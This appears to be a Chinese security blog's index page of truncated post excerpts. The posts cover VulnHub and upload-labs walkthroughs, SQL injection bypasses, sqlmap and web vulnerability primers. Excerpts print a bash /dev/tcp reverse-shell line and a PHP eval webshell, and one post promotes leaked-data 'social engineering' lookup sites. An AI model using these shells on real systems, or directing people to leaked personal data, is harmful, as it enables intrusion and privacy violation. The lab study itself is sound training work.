摘要: Prime 1、nmap 2、web渗透 随便看看 首页隐写查看 目录爆破 gobuster feroxbuster dirsearch dirb 只有dirb扫出来 whatweb searchsploit WordPress 5.2.2 WordPress利用点基本上都是插件或者主题,这里暂时都 阅读全文
posted @ 2024-02-14 16:27 gcc_com 阅读(4) 评论(0) 推荐(0) 编辑
摘要: 42种常见网站漏洞,让你水得快速,水得专业 转载:零漏安全 2024-01-10 12:29 发表于河南 免责声明:由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请 阅读全文
posted @ 2024-02-09 21:54 gcc_com 阅读(72) 评论(0) 推荐(0) 编辑
摘要: 反序列化漏洞 什么是序列化、反序列化 例子引入 序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象状态,重新创建该对象。 简单的来讲:(含例子easy.php) 序列化:把对象转换为字节序列的过程 阅读全文
posted @ 2024-02-06 09:28 gcc_com 阅读(21) 评论(0) 推荐(0) 编辑
摘要: DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't t 阅读全文
posted @ 2024-02-05 00:16 gcc_com 阅读(5) 评论(0) 推荐(0) 编辑
摘要: hackable II(VulnHub) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 阅读全文
posted @ 2024-02-04 00:06 gcc_com 阅读(5) 评论(0) 推荐(0) 编辑
摘要: Misdirection nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subprocess,os;s= 阅读全文
posted @ 2024-02-03 23:51 gcc_com 阅读(11) 评论(0) 推荐(0) 编辑
摘要: Upload-labs Upload-labs_Pass-01-->绕过前端校验 法一:关闭浏览器js的功能 法二:通过先上传合法的文件后缀,在通过抓包进行文件后缀修改 function checkFile() { var file = document.getElementsByName('upl 阅读全文
posted @ 2024-01-30 00:41 gcc_com 阅读(25) 评论(0) 推荐(0) 编辑
摘要: pikachu通关教程(暴力破解) ①基于表单的暴力破解 不用多说,直接常见用户、弱口令爆破即可。 账号:admin 密码:123456 账号:test 密码:test ②验证码绕过(on client) 提交请求,没有抓到包,说明验证码是前端校验,只要保证能过前端,后面的验证码将不进行校验(把验证 阅读全文
posted @ 2024-01-28 09:21 gcc_com 阅读(51) 评论(0) 推荐(0) 编辑
摘要: 文件包含漏洞 文件包含漏洞简介 文件包含漏洞基础介绍 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控 阅读全文
posted @ 2024-01-27 12:33 gcc_com 阅读(23) 评论(0) 推荐(0) 编辑
摘要: upload-labs-main-v1.0 Pass-01【前端校验】 解题wp (By:独立团孙德胜Alan) 本Pass是客户端过滤,可以通过禁用JS的方式绕过! 1、打开第一关 2、上传一个普通的shell.php文件 <?php @eval($_POST('Alan'));?> 提示不允许上 阅读全文
posted @ 2024-01-26 09:46 gcc_com 阅读(20) 评论(0) 推荐(0) 编辑
摘要: 文件上传漏洞 文件上传漏洞简介 文件上传漏洞出现在有上传功能的应用程序中。如果应用程序对用户的上传文件没有控制或者上传功能存在缺陷,攻击者可以利用应用程序的文件上传漏洞将木马,病毒等有危害的文件上传到服务器上面,控制服务器。 文件上传漏洞产生的主要原因是:应用程序中存在上传功能,但是对上传的文件没有 阅读全文
posted @ 2024-01-25 10:11 gcc_com 阅读(41) 评论(0) 推荐(0) 编辑
摘要: web安全思维导图(白帽子) 客户端脚本安全 服务端应用安全 白帽子讲web安全 安全运营体系建设 阅读全文
posted @ 2024-01-19 22:48 gcc_com 阅读(26) 评论(0) 推荐(0) 编辑
摘要: sqlmap使用教程 目录sqlmap使用教程1、介绍2、常用参数3、tamper脚本4、使用示例基础使用进阶使用直接使用5、案例演示案例一:使用Sqlmap获取DVWA数据案例二:利用unmagicquotes脚本绕过magicquotes 1、介绍 SQLMAP是一个开放源码的渗透测试工具,它可 阅读全文
posted @ 2024-01-18 09:09 gcc_com 阅读(66) 评论(0) 推荐(0) 编辑
摘要: 常见sql注入绕过方法 目录常见sql注入绕过方法1、空格过滤绕过漏洞代码示例/**/绕过制表符绕过换行符绕过括号绕过`反引号绕过2、内联注释绕过【常见waf!!!】3、大小写绕过4、双写关键字绕过5、编码绕过漏洞示例代码双重URL编码绕过十六进制编码绕过Unicode编码绕过ASCII编码绕过6、 阅读全文
posted @ 2024-01-17 22:45 gcc_com 阅读(190) 评论(1) 推荐(0) 编辑
摘要: 渗透测试 | 信息收集常用方法总结 简述 几乎每一个学习渗透的安全人员,都会被告知,信息收集是渗透测试的本质,那事实果真如此嘛?答案是,是的!信息收集作为渗透测试的前期主要工作,说白了叫做确定目标,以达到制作渗透计划的目的,这是非常重要的,甚至有的时候,仅仅通过信息收集,就可以拿到目标的shell了 阅读全文
posted @ 2024-01-15 09:50 gcc_com 阅读(86) 评论(0) 推荐(0) 编辑
摘要: 如何在 Ubuntu 20.04 上安装 Java且实现版本切换 在这个指南中,我们将会描述如何在 Ubuntu 20.04 上安装 Java。 Java 是世界上最流行的编程语言之一,被用来构建各种不同的应用和系统。Java 运行在所有的主流操作系统和设备上。你可以在你的笔记本,电话和游戏中发现使 阅读全文
posted @ 2024-01-11 23:15 gcc_com 阅读(68) 评论(0) 推荐(0) 编辑
摘要: 如何在 Ubuntu 22.04 LTS 中安装 Docker 和 Docker Compose 在 Ubuntu 中使用 Docker Compose 安装 Docker 引擎的分步指导。 Docker 依赖项 为了安装并配置 Docker ,你的系统必须满足下列最低要求: 64 位 Linux 阅读全文
posted @ 2024-01-01 19:24 gcc_com 阅读(500) 评论(2) 推荐(1) 编辑
摘要: 免费社工库分享 来源于:flygon-sec-wiki-master 免费好用的 社工库网站 和 Telegram社工库机器人,查询帐号、密码、邮箱、手机号、身份证及各种隐私数据是否泄露,看看你是否也处于数据外泄事件之中。请勿用于违法用途,不要查询他人的隐私信息,保护好个人隐私!!! 了解一下社工库 阅读全文
posted @ 2023-12-31 10:54 gcc_com 阅读(23) 评论(0) 推荐(0) 编辑
摘要: 初识SQL注入↗ 1、SQL注入原理 SQL注入漏洞是指攻击者通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,而网站应用程序未对其进行过滤,将恶意SQL语句带入数据库使恶意SQL语句得以执行,从而使攻击者通过数据库获取敏感信息或者执行其他恶意操作。 2、SQL注入危害 ➢ 绕过登录验证:使 阅读全文
posted @ 2023-12-21 23:39 gcc_com 阅读(35) 评论(0) 推荐(0) 编辑
摘要: 渗透测试常用术语总结 题记 人的一生会遇到两个人,一个惊艳了时光,一个温柔了岁月。——苏剧《经年》 正文 我是会把我遇到很晦涩或者难以理解的词语分享到这的。相信大家和我一样,搞不清这些专业名词的区别,所以我来整理一下。 1. POC、EXP、Payload与Shellcode POC:全称 ' Pr 阅读全文
posted @ 2023-12-20 13:20 gcc_com 阅读(50) 评论(0) 推荐(0) 编辑